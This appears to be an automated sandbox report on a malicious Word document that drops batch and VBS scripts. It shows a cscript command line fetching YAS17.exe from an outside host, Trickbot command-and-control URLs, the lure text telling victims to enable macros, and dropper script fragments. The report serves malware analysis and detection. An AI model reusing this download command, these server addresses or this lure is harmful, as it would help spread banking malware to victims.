Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, ZXTRTU.exe, 00000007.00000002.1498540169.029D6000.00000004.00000001.sdmpString found in binary or memory: https://181.129.104.139:449/yas17/642294_W617601.6A691057E4DEC904761D3BFBC750047B/5/spk/
Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmpString found in binary or memory: https://181.129.104.139:449/yas17/642294_W617601.6A691057E4DEC904761D3BFBC750047B/5/spk/MEMX
Source: ZXTRTU.exe, 00000007.00000002.1488654040.00313000.00000004.00000020.sdmpString found in binary or memory: https://api.ip.sb/ip:
Source: ZXTRTU.exe, 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/?format=text2
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: ZXTRTU.exe, 00000007.00000002.1495487520.01460000.00000004.00000001.sdmp, ZXTRTU.exe, 00000007.00000002.1494866799.00E60000.00000004.00000001.sdmpString found in binary or memory: https://www.myexternalip.com/raw
Source: ZXTRTU.exe, 00000007.00000002.1494866799.00E60000.00000004.00000001.sdmpString found in binary or memory: https://www.myexternalip.com/raw2
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49160 -> 443

E-Banking Fraud:

barindex
Yara detected TrickbotShow sources
Source: Yara matchFile source: 00000007.00000002.1498504077.029A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZXTRTU.exe PID: 2356, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,5_2_005B0120
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F0120 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,7_2_005F0120

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Windows\System32\cmd.exeDropped file: Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") Jump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B55B0 NtQuerySystemInformation,NtQueryObject,NtQuerySystemInformation,Sleep,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,NtQueryObject,lstrcmpiW,NtQueryObject,lstrcmpiW,CLSIDFromString,CloseHandle,CloseHandle,5_2_005B55B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A2330 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,5_2_005A2330
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_01300430 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,5_2_01300430
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_0130040F GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,5_2_0130040F
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_013002E2 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,5_2_013002E2
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F55B0 NtQuerySystemInformation,NtQueryObject,NtQuerySystemInformation,Sleep,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,NtQueryObject,lstrcmpiW,NtQueryObject,lstrcmpiW,CLSIDFromString,CloseHandle,CloseHandle,7_2_005F55B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E2330 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,7_2_005E2330
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_00690430 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,7_2_00690430
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_0069040F GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,7_2_0069040F
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_006902E2 GetCurrentProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,7_2_006902E2
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005BA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,5_2_005BA1A0
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A15D05_2_005A15D0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A45C05_2_005A45C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B09C05_2_005B09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B88705_2_005B8870
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005ACC905_2_005ACC90
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A90905_2_005A9090
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A8C805_2_005A8C80
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AA1505_2_005AA150
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A65405_2_005A6540
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AF9105_2_005AF910
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B99805_2_005B9980
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AB1B05_2_005AB1B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005BA1A05_2_005BA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A32305_2_005A3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A82C05_2_005A82C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005BB2805_2_005BB280
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A1AB05_2_005A1AB0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AAB405_2_005AAB40
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005A53C05_2_005A53C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E15D07_2_005E15D0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E45C07_2_005E45C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F09C07_2_005F09C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E32307_2_005E3230
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E1AB07_2_005E1AB0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F88707_2_005F8870
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005ECC907_2_005ECC90
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E90907_2_005E9090
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E8C807_2_005E8C80
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005EA1507_2_005EA150
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E65407_2_005E6540
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005EF9107_2_005EF910
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F99807_2_005F9980
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005EB1B07_2_005EB1B0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005FA1A07_2_005FA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E82C07_2_005E82C0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005FB2807_2_005FB280
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005EAB407_2_005EAB40
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005E53C07_2_005E53C0
Document has an unknown application nameShow sources
Source: 98.docOLE indicator application name: unknown
PE file contains strange resourcesShow sources
Source: ZXTRTU.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@13/14@2/3
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AD2E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,5_2_005AD2E0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005BA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,5_2_005BA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B2250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,5_2_005B2250
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005BA620 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,5_2_005BA620
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005F2250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_005F2250
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005ED2E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,7_2_005ED2E0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005FA1A0 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,OpenProcessToken,RevertToSelf,DuplicateTokenEx,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_005FA1A0
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 7_2_005FA620 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,7_2_005FA620
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005B3600 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpW,lstrcmpW,Process32NextW,CloseHandle,lstrcmpW,5_2_005B3600
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeCode function: 5_2_005AD750 GetVersion,CoCreateInstance,5_2_005AD750
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$98.docJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{F10BE3EE-9073-8952-E70B-9EB847D507E5}
Source: C:\Users\user\AppData\Roaming\List15\ZXTRTU.exeMutant created: \BaseNamedObjects\Global\{5CA4B01D-36F8-AA38-E7BE-3FCF59B1E70D}
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR672A.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: 98.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: 98.docOLE document summary: title field not present or empty
Source: 98.docOLE document summary: edited time not present or 0
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\DiskDrive\1\Volume\BackFiles\errorfix.bat
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ictd.ae/YAS17.exe C:\Users\user\AppData\Roaming\List15\ZXTRTU.exe
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................(.H.....c.k...........3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........8.+....v@..Jz.H...............+...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p........................................xH.<..J.....b.v..3|..+.....j....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................j...............@F.J..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........8.+....v@..J..H...............+...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.3.4.8.3.6.3.6.8.6.1.9.8.7.3.9.1.7.9.7.5.1.5.8.7.2.2.6......b.v...u`.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........e.\.B.a.c.k.F.i.l.e...3|l.+.|.\...+.(...|.+...\u\.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................9.4.7.4.7.4.2.6.4.8.5.2.8.5.3.7.7.6.9.3.2.1.4.5.8.6.7.2......b.v...u`.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.4.1.2.9.4.6.1.7.9.1.4.3.6.4.9.7.4.9.3.5.8.2.2.7.3.9.8......b.v...u`.....+...+.d.+.8.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p.................................+...+.|.\.8...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...$............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...*....................................xH.<..J.....b.v..3|..+..........E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...0.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...6.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...<.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...B...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...e...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...q............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t. . ............xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...}...........................m.e. .N.e.x.t. . .........3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................e.x.t. . .........3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................e.x.t. . .........3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....4.......p........................................xH.<..J.....b.v..3|..+.\.+......E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p.........................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p.................................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p.....................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .S.e.t. .m.y.S.e.t.t.i.n.g.s.1. .=. .W.s.c.r.i.p.t...A.r.g.u.m.e.n.t.s. . ...+.\.+.L....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................s.1. .=. .W.s.c.r.i.p.t...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p............................... .W.s.c.r.i.p.t...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p................................... .W.s.c.r.i.p.t...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...!...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...@...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p...L............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...R....................................xH.<..J.....b.v..3|..+.....~....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...X.....................................................3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...^.............................................3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...d.................................................3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...j...............................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .m.y.S.e.t.t.i.n.g.s.5. .=. .m.y.S.e.t.t.i.n.g.s.1.(.0.). . ..J.....b.v..3|..+.\.+.>....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p............................... .m.y.S.e.t.t.i.n.g.s.1...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................e.t.t.i.n.g.s.1...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................e.t.t.i.n.g.s.1...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.3.6.8.1.9.1.8.3.8.6.5.9.6.2.2.7.3.4.3.5.4.7.7.2.8.9.2.6.3.2.4.1.9.3.3.9.+...+.d.+.J.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................9.+...+.|.\.J...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...$.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.3.5.8.3.8.2.7.6.7.6.7.4.7.8.1.5.7.7.2.5.7.6.4.3.8.1.8.5.6.4.8.7.2.8.6.1.+...+.d.+.J.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................1.+...+.|.\.J...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...).Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...-...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.6.4.4.7.2.4.7.1.8.3.4.3.5.7.3.9.4.8.7.2.4.3.9.9.8.9.8.4.3.9.4.8.4.4.1.5.+...+.d.+.J.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...?...........................5.+...+.|.\.J...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,.....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...V...........................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.4.9.5.5.6.5.6.9.2.3.1.2.2.2.2.1.6.5.3.7.1.9.4.8.2.4.3.7.5.1.1.2.1.2.2.1.+...+.d.+.J.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...h...........................1.+...+.|.\.J...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...3.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.9.8.5.3.8.9.1.2.9.3.1.8.1.3.8.5.7.1.8.2.9.9.9.3.8.9.4.5.9.2.2.8.9.2.5.1.+...+.d.+.J.............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................1.+...+.|.\.J...|.\.......3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ........1#........... ..H.+...+.E..J........1#......@F.J. ..H.+..xH.....V..J............H.+.....#..u........`.....,...8.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.4.......p................................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .c.o.n.c.e.p.t. .=. .m.y.S.e.t.t.i.n.g.s.1.(.1.). . ....xH.<..J.....b.v..3|..+.\.+.6....E.J....T.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....4.......p...............................e.t.t.i.n.g.s.1.(.1.). ...3|..+.H.+......F.J....@.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................>.0.....4.......p...............................n.g.s.1.(.1.). ...3|..+...3|..+.P.+........J....H.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.....4.......p...................................n.g.s.1.(.1.). ...3|..3|..+.....Z....E.J....D.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...................................@F.J.........F.J...}..3|..+.|.+......E.J....t.+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4.......p...............................u.m.e.\.B.a.c.k.F.i.l.e...3|l.+...+......E.J......+.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................e.c.h.o.........p...*............................xH.<..J.....b.v...u`.....+...+.d.+...............fuJump to behavior
